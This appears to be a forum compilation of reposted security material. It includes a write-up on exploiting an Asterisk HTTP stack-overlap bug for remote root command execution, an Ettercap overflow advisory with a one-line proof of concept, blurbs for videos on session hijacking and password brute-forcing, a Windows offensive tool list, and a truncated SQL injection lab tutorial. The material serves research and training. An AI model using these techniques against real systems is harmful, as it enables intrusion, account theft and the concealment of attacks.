ast_pthread_create_detached_background is a macro wrapper for the function ast_pthread_create_stack. The macro definition looks roughly like: ast_pthread_create_detached_stack(a, b, c, d, AST_BACKGROUND_STACKSIZE, ...) The important thing to note here is the argument AST_BACKGROUND_STACKSIZE. This is used by the function to set the new thread's stack size attribute before starting the thread: pthread_attr_setstacksize(attr, stacksize ? stacksize : AST_STACKSIZE) ... return pthread_create(thread, attr, start_routine, data); For builds without low memory restrictions defined, the AST_BACKGROUND_STACKSIZE and the AST_STACKSIZE macros are defined as: #define AST_BACKGROUND_STACKSIZE AST_STACKSIZE #define AST_STACKSIZE (((sizeof(void *) * 8 * 8) - 16) * 1024) /* becomes 0x3C000 */ The use of AST_STACKSIZE, or 0x3C000, to set the size of the stack for each new HTTP thread is significant, as it means the stack of the newly created thread will begin at 0x3C000 below the top of the previous thread's stack. In turn, if a value of this size or greater is used for alloca pointer subtraction, the resulting stack pointer will overlap with the stack memory of a newer thread. By carefully synchronizing the state of the threads involved so they do not collide their shared use of stack memory, it is possible to use this behavior to overwrite the contents of one thread's stack area with network data read by another thread. To visualize this, and because I love drawing stack diagrams, I present the following bad art: Synchronizing the two threads such that they do not collide and clobber each other's critical stack contents is as simple as not sending data when a given thread is expecting it. While one thread is waiting for data in a blocking read operation, the other thread may be using the stack. Using the HTTP POST method (as is required to trigger the vulnerability) allows for two separate network read operations per thread: one for the initial read of HTTP headers, and a second for reading the HTTP Content-Data. Having two individual network read operations per thread provides enough blocking opportunity to align the augmented stack pointer of the first thread to a desirable location used by the second thread. Better yet, this provides an opportunity to align the pointer of the first thread to a location that is not yet used by the second thread, but will be be used once the second thread completes its initial read and resumes execution. The following diagram steps attempt to illustrate this process, ignoring trivial details and using round numbers for simplicity. 1. Two socket connections to the HTTP AMI service are established, causing Asterisk to create two threads to handle the connections. Both threads are expecting HTTP headers and so they are both blocking on a read operation. To depict the state of these threads: 2. Thread1 is sent HTTP headers with an HTTP Content-Length string equivalent to 0x3C900. Once headers are received, Thread1's initial read operation finishes. It performs the alloca, subtracting its stack pointer by 0x3C900, which places its pointer for *buf at 0x900 bytes down from the top of Thread2's stack: 3. Thread1 is then sent approximately 0x700 bytes of the 0x3C900 it is expecting. This advances the *buf pointer index used by fgets up the stack, closer to Thread2's current stack pointer. Thread1 continues waiting as it has not yet received the full amount of data expected (0x3C900). 4. Thread2, still waiting on its initial network read, is sent HTTP POST headers with a Content-Length string equivalent to approximately 0x200, which it uses for its own alloca, subtracting from its stack pointer. Coordinating this length carefully places it precisely where the *buf pointer in Thread1 fgets currently points. Thread2 then calls fgets to receive its HTTP Content-Data, causing it to block while waiting to read in data. 5. Thread1 is sent 4 more bytes of the data it is waiting to receive, which is stored starting at its current *buf index in fgets, and overwrites where Thread2's stored return address is for fgets. A return from fgets can then be triggered by sending the remaining data expected, or a newline character, or also by simply closing the connection. Once Thread2 returns, EIP is restored from the overwritten return address value and execution flow is controlled. Protection Mechanisms Precisely overwriting only desired stack contents leaves stack canaries intact so that they do not interfere with exploitation. To avoid non-executable memory protections, typical return-oriented techniques may be employed to reuse existing executable memory once execution flow is controlled. This leaves Address Space Layout Randomization (ASLR), and more specifically, Asterisk builds compiled as Position-Independent-Executables (PIE) as the only remaining obstacle to overcome, as fixed return locations cannot be used in this case. While the default Makefile generated to compile Asterisk from source does not include flags for PIE, popular Linux distributions may package their own Asterisk built with PIE for extra security, such as with Ubuntu (props to @kees_cook for keeping us on our toes with this). ASLR via PIE significantly frustrates exploitation. Since Ubuntu is a popular distribution, and having set the bar for difficulty in this case, the Ubuntu Asterisk build is the target we challenged ourselves with. Who Was Phone I will save you from babble about entropy and efforts made to try and guess addresses in the presence of ASLR. Instead we will discuss how this vulnerability can be reliably exploited for memory disclosure, and used to determine the location of Asterisk code memory to redirect execution to. The function generic_http_callback in main/manager.c is the URL handling function executed when triggering the vulnerability, and is defined as: static int generic_http_callback(struct ast_tcptls_session_instance *ser, enum ast_http_method method, enum output_format format, struct sockaddr_in *remote_address, const char *uri, struct ast_variable *get_params, struct ast_variable *headers) { Above you can see the output_format argument format is an enumeration value for one of the possible formats used for the reply. Its expected possible values are 0, 1, or 2 for "plain", "html", "xml" respectively. This value is used to retrieve a pointer from a global array when constructing a response in generic_http_callback: /* ... */ ast_str_append(&http_header, 0, "Content-type: text/%s\r\n" "Cache-Control: no-cache;\r\n" "Set-Cookie: mansession_id=\"%08x\"; Version=1; Max-Age=%d\r\n" "Pragma: SuppressEvents\r\n", contenttype[format], session->managerid, httptimeout); /* ... */ ast_http_send(ser, method, 200, NULL, http_header, out, 0, 0); /* ... */ The contenttype array contains the pointers to the strings used for the HTTP response, and thus the pointer retrieved from this look-up directly influences data sent back to the HTTP user. By conducting the same style of stack pointer manipulation previously described, it is possible to align a thread's *buf pointer to overwrite the stack memory where format is stored, so it indexes beyond the contenttype array into other memory. With the help of some handy debugger scripting, I was able to find a pointer->pointer->code from a relative offset of contenttype. My code to do this with VDB is shown below. (Comments document the code a little bit, but a more extensive explanation of VDB is beyond the scope of this post): for m in trace.getMemoryMaps(): # check memory map name if m[3].lower() == "/usr/sbin/asterisk": # check for flags Read & Write for data segment if m[2] == 6: addr = m[0] memlen = m[1] memory = trace.readMemory(addr, memlen) # check for Execute flag elif m[2] == 5: # save beginning and ending of executable memory code = m[0] codestop = code+m[1] # from each offset in the memory for offset in range(memlen-4): # read for the size of a pointer ptr = struct.unpack("<I", memory[offset:offset+4])[0] # check if it is a pointer if ispoi(ptr): # read the value at the pointer ptr = struct.unpack("<I", trace.readMemory(ptr, 4))[0] # is that value in the asterisk code? if ptr > code and ptr < codestop: print " [*] Found 0x%08x -> 0x%08x" % (addr+offset, ptr) The script simply searches the memory maps of the attached process for the Asterisk data and code memory regions. Once they are found, the value at every possible offset in the data map is checked to be a valid memory address. Passing this check, the value at the memory it points to is then also checked to see if it is a pointer to code memory and then prints out valid matches. This script identified 8 locations of usable pointers when ran against Ubuntu's packaged Asterisk binary. By overwriting the saved format variable with an index to offset to one of these pointer sequences, it is possible to manufacture a remote memory disclosure and determine an address of Asterisk code memory. Putting this all together allows for successful remote arbitrary code execution despite ASLR/PIE/NX/STACK COOKIES/ALL_OF_THE_THINGS compiled in with the Ubuntu build. To add to an already silly amount of convenience with the conditions surrounding this bug, when gaining EIP control through the method described, the next value on the stack above the overwritten return address is a pointer to the buffer passed to fgets in the second thread. This buffer is populated with the second thread's received HTTP Content-Data (remotely-controlled data). Using the memory disclosure to calculate the address of a call to the function ast_safe_system, which takes a single string pointer argument to execute as a command line, it is simple to exploit the return in the second thread to execute arbitrary commands from the Asterisk process -- which often runs as root. Using this to spawn a remote shell with Ubuntu's default dash shell is a little obnoxious, but possible, and an exercise left up to the reader. Hope you enjoyed the post! -- Brandon Edwards @drraid Sursa: DoS? Then Who Was Phone?

[h=1]Ettercap <= 0.7.5.1 Stack Overflow Vulnerability[/h] Title: Ettercap Stack overflow (CWE-121) References: CVE-2012-0722 Discovered by: Sajjad Pourali Vendor: http://www.ettercap.sourceforge.net/ Vendor contact: 13-01-01 21:20 UTC (No response) Solution: Using the patch Patch: http://www.securation.com/files/2013/01/ec.patch Local: Yes Remote: No Impact: low Affected: - ettercap 0.7.5.1 - ettercap 0.7.5 - ettercap 0.7.4 and earlier Not affected: - ettercap 0.7.4.1 --- Trace vulnerable place: ./include/ec_inet.h:27-44 enum { NS_IN6ADDRSZ = 16, NS_INT16SZ = 2, ETH_ADDR_LEN = 6, TR_ADDR_LEN = 6, FDDI_ADDR_LEN = 6, MEDIA_ADDR_LEN = 6, IP_ADDR_LEN = 4, IP6_ADDR_LEN = 16, MAX_IP_ADDR_LEN = IP6_ADDR_LEN, ETH_ASCII_ADDR_LEN = sizeof("ff:ff:ff:ff:ff:ff")+1, IP_ASCII_ADDR_LEN = sizeof("255.255.255.255")+1, IP6_ASCII_ADDR_LEN = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1, MAX_ASCII_ADDR_LEN = IP6_ASCII_ADDR_LEN, }; ./include/ec_resolv.h:42 #define MAX_HOSTNAME_LEN 64 ./src/ec_scan.c:610-614 char ip[MAX_ASCII_ADDR_LEN]; char mac[ETH_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; ./src/ec_scan.c:633-635 if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 || *ip == '#' || *mac == '#' || *name == '#') continue; --- PoC: sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow --- + Sajjad Pourali + http://www.securation.com + Contact: sajjad[at]securation.com Sursa: Ettercap <= 0.7.5.1 Stack Overflow Vulnerability

Hijacking Facebook Accounts Over A Network Description: In this video i show you how to Hijack facebook accounts over a network using with Ettercap, Wireshark, Grease Monkey and Cookie Injector. You will need the following stuff for this to work. Backtrack Linux - Pentesting Operating System Wireshark - Packet Analzyer comes with Backtrack 5 Firefox - Browser comes with Backtrack 5+ Grease Monkey - Firefox addon Cookie Injector - Script to Dump Wireshark Data. Links: Backtrack Linux Download: BackTrack Linux - Penetration Testing Distribution Passsniffer.sh from video: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf Grease Monkey - Firefox addon: https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ Cookie Injector for Grease Monkey: Original Cookie Injector for Greasemonkey Credits to tedbear for the Passsniffer.sh script. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hijacking Facebook Accounts Over A Network

Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities Description: Abstract We present our work of using interactive static analysis to improve upon static analysis techniques by introducing a new mixed-initiative paradigm for interacting with developers to aid in the detection and prevention of security vulnerabilities. The key difference between our approach and standard static analysis is interaction with the developers. Specifically, our approach is predicated on the following principles: • Secure programming support should be targeted towards general developers who understand the application logic, but may have limited knowledge of secure programming; • Secure programming support should be provided while the code is being developed, integrated into the development tools; • Secure programming support should reduce the workload in detecting and resolving vulnerabilities; and • Developers should be able to provide feedback about the application context that can drive customized security analysis. We have performed evaluations of our approach using an active open source project, Apache Roller. Our results shows that interactive data flow analysis can potential reduce the effort of finding and fixing vulnerabilities by as much as 50%. Using interactive control flow analysis, we found cross request forgery vulnerabilities in current Roller release. The Roller team issued patches based on our report (CVE-2012-2380). We have also performed user studies, both for students and for professional developers with promising results. For example, preliminary data suggests that using ASIDE students, who do not have secure programming training, can write much more secure code. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Using Interactive Static Analysis for Early Detection of Software Vulnerabilities - Bill Chu on Vimeo Sursa: Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities

Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit Description: In this video I will show you how to perform a brute - force attack on Mysql and how to use John the Ripper Hash Cracking module in Metasploit Framework. When you are using John the Ripper Module, so make sure that your database is connected to Metasploit Framework or you will get an error. Modules are used .. auxiliary/scanner/mysql/mysql_version Enumerates the version of MySQL servers auxiliary/scanner/mysql/mysql_login This module simply queries the MySQL instance for a specific user/pass (default is root with blank). auxiliary/scanner/mysql/mysql_hashdump This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. Source : - Penetration Testing Software | Metasploit Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit

Fastest Router Hacking With Hydra - Official Video Description: THC-Hydra A very fast network logon cracker which support many different services. INTRODUCTION ------------ Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system. Currently this tool supports: AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. However the module engine for new services is very easy so it won't take a long time until even more services are supported. Your help in writing, enhancing or fixing modules is highly appreciated!! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Fastest Router Hacking With Hydra - Official Video

Windows Tools For Penetration Testing Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system. HashCheck Shell Extension The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files). Netcat Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor. Metasploit Framework The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. RealVNC Viewer Remote access software for desktop and mobile platforms. GetIf SNMP tool that allows you to collect information about SNMP devices. Cain & Abel Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. Wireshark Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development. PuTTY PuTTY is an SSH and telnet client for the Windows platform. Pass The Hash Toolkit The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes. Cachedump Recovering Windows Password Cache Entries. Fport Identify unknown open ports and their associated applications. Nbtscan This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. Winfo Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed. ClearLogs ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer. SQLDict SQLdict is a dictionary attack tool for SQL Server. PMDump PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process. GrabItAll GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too. DumpUsers DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1. BrowseList BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading). Remoxec Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation). WMICracker Brute-force tool for Windows Management Instrumentation (WMI). Venom Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled. SMBAT The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms. RPCScan RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins. LSASecretsDump LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window. SQLPing SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever. OAT The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers. Pwdump7 Extract password hashes from local user accounts. PsTools The PsTools package provides a set of command line utilities that allow you to manage local and remote systems. Incognito Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators. DumpSec DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information. X-Deep32 X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc. LC5 Windows password cracker. Ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. SiVuS SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations. Sursa: Windows Tools For Penetration Testing

SQL Injections: An Introduction Audi-1 January 07, 2013 According to the Open Web Application Security Project (OWASP), injection attacks are first on the list of the top 10 web vulnerabilities. Diving into these, SQL injections are responsible for a big chunk of this. Exploitation of SQL injections is trivial. This vulnerability is not just web related but can also occur in desktop applications that use SQL server backends. The detectability of these vulnerabilities depends on the complexity of the application in question. Most times, point-and-shoot tools fail to successfully detect these vulnerabilities. Sometimes there is difficulty in putting the desired conditions to successfully exploit the injections into these point-and-click tools, causing the vulnerability to go unnoticed. A generic solution to prevent these sorts of flaws from creeping in while programming is to sanitize all inputs and use proper encoding, furthermore using the white-list approach to allow only data which needs to be used by application. SQLI-LABS is an attempt to walk through the process of SQL injections in a dumb way. The focus is on understanding the core concepts, making it easy to be followed by people who are learning to break into the field of security and penetration testing. To help the learning process, a test bed has been prepared which can be followed along with this post. One can also follow the video explanations for each lesson for brief explanations about the topic. The test bed can be grabbed from https://github.com/Audi-1/sqli-labs. You can follow readme.txt for installation instructions or can watch the brief video. What are SQL injections? An SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary pieces of malicious data into the input fields of an application, which, when processed by the application, causes that data to be executed as a piece of code by the back end SQL server, thereby giving undesired results which the developer of the application did not anticipate. The backend server can be any SQL server (MySQL, MSSQL, ORACLE, POSTGRESS, to name a few) The ability of the attacker to execute code (SQL statements) through vulnerable input parameters empowers him to directly interact with the back end SQL server, thereby leveraging almost a complete compromise of system in most cases. What are different types of SQL injections? SQL injections can be classified and categorized in different ways, based on the type of data extraction channel, the response received from server, how server responses aid in leveraging the successful exploitation, impact point, etc. Based on the data extraction channel Inband or inline Out-of-band SQL injections that use the same communication channel as input to dump the information back are called inband or inline SQL Injections. This is one of the most common methods, readily explained on the Internet in different posts. For example, a query parameter, if injectable, leads to the dumping of info on the web page. Injections that use a secondary or different communication channel to dump the output of queries performed via the input channel are referred to as out-of-band SQL injections. For example, the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain. Based on the response received from the server Error-based SQL injections Union query type. Double query Injections. Blind SQL Injections Boolean-based blind injections. Time based blind injections. Error-based SQL injections are primarily those in which the SQL server dumps some errors back to the user via the web application and this error aids in successful exploitation. In the image below, the yellow line displays the error. These will be discussed further in this post and in related posts to come. Blind SQL injections are those injections in which the backend database reacts to the input, but somehow the errors are concealed by the web application and not displayed to the end users. Or the output is not dumped directly to the screen. Therefore, the name “blind” comes from the fact that the injector is blindly injected using some calculated assumptions and tries. Based on how the input is treated in SQL query (what data type) String-based Numeric- or integer based Based on how the input parameter would be treated in the back end SQL query, an injection can be classified as string- or integer-based. Based on the degree/order of injections (where the impact happens) First-order injections. Second-order injections. The degree or the order of injection identifies the way in which the injection yields the output. If the injection directly delivers the result, it is considered to be a first-order injection, but if the injection input yields no successful result in extraction, but instead impacts some other result which the attacker can take advantage of on some other place/page, it is called a second-order injection. Consider second-order injections similar to stored XSS injections, where the input is stored in the application and later rendered on some other page, thereby impacting that page indirectly because of initial malicious input. Based on the injection point location Injection through user input form fields. Injection through cookies. Injection through server variables. (headers-based injections) Why does SQL injection happen? Generally when an application is communicating with the backend database, it does so in the form of queries with the help of an underlying database driver. This driver is dependent on the application platform being used and the type of backend database, such as MYSQL, MSSQL, DB2, or ORACLE. A generic login query would look something like this: `SELECT Column1, Column2,Column3 FROM table_name WHERE username=’$variable1? AND password=’$variable2?;` We can split this query into two parts, code section and the data section. The data section is the $variable1 and $variable2 and quotes are being used around the variable to define the string boundary. Let us try to walk through the process in a crude way. Say at the login form, the username entered is Admin and password is p@ssw0rd which is collected by application and values of $variable1 and $variable2 are placed at their respective locations in the query, making it something like this. `SELECT Column1, column2, Column3 FROM table_name WHERE username=’Admin’ AND password=’p@ssw0rd’;` Now the developer assumes that users of his application will always put a username and password combination to get a valid query for evaluation by database backend. What if the user is malicious and enters some characters which have some special meaning in the query? For example a single quote. So, instead of putting Admin, he puts Admin’, thereby causing an error thrown by the DB driver. Why? Because of the unpaired quote entered by the user breaking the application logic. We will discuss the process in detail. To summarize: Whenever an attacker is able to escape the data boundaries, he can append data which then gets interpreted as code by the DB Driver and is executed on the SQL backend, thereby causing SQL injection. ERROR-based SQL injections In general, all programming languages give developers a flexibility to debug and fix their applications by using some inbuilt error-handling functions/libraries. These could be some explicit function, classes, or methods that deliver friendly error messages so that the troubleshooting experience can be streamlined and detecting the part of code responsible for raising those exceptions can be easier. These functions should be controlled before an application goes to production because they can dump a lot of sensitive info about the application and underlying logic, thereby making it easy for a bad guy to exploit the application. Therefore, those applications where these error-handling functions are available to aid in gaining useful info about the application or in dumping the database info by means of SQL interaction are classified as error-based SQL Injections. Based on the way data is extracted using helpful errors, the error-based injections can be classified into two main types: Union-query type Double-query type Let’s discuss the process of SQLi in detail. To do so, let us consider Lessons 1 to 4. We will continue to explore the further lessons of Labs in coming posts. For the purpose of demonstration, I have installed the SQLI-LABS under the /var/www location on my Backtrack installation. Download and follow the install instructions to set it up to follow along. A methodological approach is always helpful in understanding the underlying logic. The major process is as follows: Enumerate the application behavior Fuzz the application with bogus data with the goal of crashing the application Try to control the injection point by guessing the query used in the backend Extract the data from the back end database Enough theory, time for some action. ENUMERATION: Let us start with enumeration of the applications. Lessons 1 to 4 look almost identical. When we load the page for Less-1, it asks us to input ID as a GET parameter, which should be a numeric value. Providing the ID as a numeric value, we see a specific username and password on screen when the value of ID is between 1 through 14. For any other value, we see nothing being displayed on screen. ANALYSIS of ENUMERATION id=15 => No output on screen. ID=1 => Login name= Dumb, Password=Dumb ID=2 => Login name= Angelina, Password=I-kill-you ID=3 => Login name= Dummy, Password=p@ssw0rd ID=4 => Login name= secure, Password=crappy ID=5 => Login name= stupid, Password=stupidity ID=6 => Login name= superman, Password=genious ID=7 => Login name= batman, Password=mob!le ID=8 => Login name= admin, Password=admin ID=9 => Login name= admin1, Password=admin1 ID=10 => Login name= admin2, Password=admin2 ID=11 => Login name= admin3, Password=admin3 ID=12 => Login name= dhakkan, Password=Dumbo ID=13 => Login name= admin4, Password=admin4 ID=14 => Login name= admin5, Password=admin5 ID=15 => No output on screen. ID=20 => No output on screen. ID=100 => No output on screen. Result of Enumeration: The database seems to have 14 records in the table and for any non-existent value ID it returns an empty set. FUZZING: Generally the developer of the application assumed that the user would input integer values. After we have enumerated the application work flow, we try to fuzz all input points of the application. So what exactly is Fuzz? It is a process for supplying arbitrary dumb patterns as input with the objective to see application behavior and try to find the discrepancies in the responses. The discrepancies indicate the possibility of vulnerability. We will fuzz all the four lessons together one by one. Below are some arbitrary inputs which we can add, append and use for purpose of detecting basic error based SQLi: ‘ “ \ ; %00 ) ( aaa Integer or string test: Because the input parameter seems to be integer value, let us try to input a string value for ID parameter and observe the behavior. Less-1 http://localhost/sqli-labs/Less-1/?id=asdf Less-2 http://localhost/sqli-labs/Less-2/?id=asdf Less-3 http://localhost/sqli-labs/Less-3/?id=asdf Less-4 http://localhost/sqli-labs/Less-4/?id=asdf Result of Integer and String Test: We see that Less-1, Less-3, and Less-4 respond by returning the empty set, whereas Less-2 returns a different behavior; it displays a MySQL error message on screen. From very basic programming knowhow, we know that a string parameter is always wrapped in single quotes or double quotes, whereas integers are used as is. Therefore we can assume that Less-1, -3, and -4 are using some sort of quotes to wrap around the user input. They consider the string entered as a non-existent value in the database and therefore respond with the empty set. Less-2 is producing a MySQL alert, meaning that there are no quotes used around the input parameter, therefore integer values work fine in a query but strings cause an error. Therefore we can deduce that Less-1, Less-2, and Less-3 are string-based injections and Less-2 is an integer-based injection. Fuzzing continued: Now let us further take the fuzz characters and try them against Less-1 through -4 one by one. Less-1 http://localhost/sqli-labs/Less-1/?id=1? Less-2 http://localhost/sqli-labs/Less-2/?id=1‘ Less-3 http://localhost/sqli-labs/Less-3/?id=1‘ All three produce a similar kind of error message with a very minute difference. Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1? at line 1 And Less-4 does not produce any alert with the injection of a single quote. http://localhost/sqli-labs/Less-4/?id=1‘ Trying the same exercise with a double quote injection, we observe that this time only Less-4 crashes the application and Less-1, Less-2, and Less-3 do not crash it anymore. Therefore, from the above tests, we have discovered that the applications Less-1, Less-2, and Less-3 are reactive to a single-quote injection and Less-4 is to a double-quote injection. Time to discover the underlying query being used by applications by using info gained above. We know that Less-1, Less-3, and Less-4 are string-based and Less-2 is numeric. Let us confirm this further by injecting a backslash, which is an escape character to print characters which have special meaning in SQL (for example, to print a ‘ we need to write it as \’ so the quote does not get evaluated and dumped as another character). Appending ID=1\ yields the following output: For Less-1 Because we input 1\, let’s look at the part of error dumped on the screen containing 1\, which is near ‘ ’1\’ LIMIT 0,1? at line 1. We observe that as our input was 1\, a single quote is visible after that, indicating that single quotes are used as a wrapper for the strings. Let’s take Less-2 and try the same. Our input is same but the output has a minor change to the Less-1, near ‘ ’1\ LIMIT 0,1? at line 1. After our input 1\ there are no quotes, again proving that Less-2 is an integer-based injection and does not need any quotes to break the query. Still confused? Let us do the same test with Less-3 and Less-4 and it will get clearer as we progress. Let us do the same test with Less-3: The error message is near ‘ ’1\’) LIMIT 0,1? at line 1. In this lesson, with the same input of 1\, we see ‘) after our parenthesis, indicating that the developer of the application has wrapped the variable inside parentheses (‘ variable’). Let’s do the same with Less-4: Error message is near ‘ “1\”) LIMIT 0,1? at line 1. In this lesson, with same input of 1\, we see “) after our parenthesis indicating that the developer of the application has wrapped variable inside parentheses (“variable”). Building up the query being used behind the scene in the applications: Less-1: SELECT * FROM TABLE_NAME WHERE ID=’$ID’ LIMIT 0,1 Less-2: SELECT * FROM TABLE_NAME WHERE ID=$ID LIMIT 0,1 Less-3: SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,1 Less-4: SELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1 COMMENTING OUT QUERY Until now, we have been able to detect the injection flaw, and able to guess a pseudo query with details on what is being used as a string delimiter or wrapper around the variable. One thing we need to understand is that, during the injection, we can only control the variable but not the delimiters used around it; therefore as soon as we inject an extra delimiter, it induces a syntax error. For a successful injection, we should close the open delimiter wrapped around the variable in the query, thereby making it possible for us to escape the string/integer boundary and execute SQL statements and also be able to handle the closing delimiter around the variable, which becomes stale. This can be done in two ways. One way is by commenting out the rest of query, and the second way is by adding an extra delimiter with extra values to make the query syntactically correct. Let us take an example: Less-1: SELECT * FROM TABLE_NAME WHERE ID=’ $ID ‘ LIMIT 0,1 In place of $ID, we put value of 1?, then the query becomes something like SELECT * FROM TABLE_NAME WHERE ID=’ 1? ‘ LIMIT 0,1 Now, this query is syntactically incorrect and needs to be fixed for execution. We found and confirmed that, by adding an extra quote for Less-1, we can successfully escape the string boundary, but we need to fix the extra ‘ which is there as part of original query. Way one: We can use SQL comments to fix the syntax. MySQL uses three types of comments: –+, # , /* */, so our injection can be 1? –+ or 1? #. So the query effectively becomes SELECT * FROM TABLE_NAME WHERE ID=’ 1?–+ ‘ LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=’ 1? # ‘ LIMIT 0,1 Complete URL with injection is: http://localhost/sqli-labs/Less-1/?id=1?–+ http://localhost/sqli-labs/Less-1/?id=1? %23 (NOTE: %23 is url-encoded value for #) For Lesson 2, we do not need any extra quotes to escape and inject queries as there are no quotes in the first place, therefore a simple commenting out should be fine. http://localhost/sqli-labs/Less-2/?id=1–+ http://localhost/sqli-labs/Less-2/?id=1 %23 (NOTE: %23 is url-encoded value for #) So the query effectively becomes SELECT * FROM TABLE_NAME WHERE ID= 1?–+ LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID= 1? # LIMIT 0,1 Let us now look at the Less-3 and Less-4. The query for Less-3 we deduced earlier was: SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,1 Therefore, to get a working query in this case, we need to first inject ‘) as discussed above to close the initial delimiter and then comment out rest of the query. SELECT * FROM TABLE_NAME WHERE ID=(‘ 1?) –+ ‘) LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=(‘ 1?) # ‘) LIMIT 0,1 The query for Less-4 we deduced earlier was: SELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1 Therefore, to get a working query in this case, we need to first inject ‘) as discussed above to close the initial delimiter and then comment out rest of the 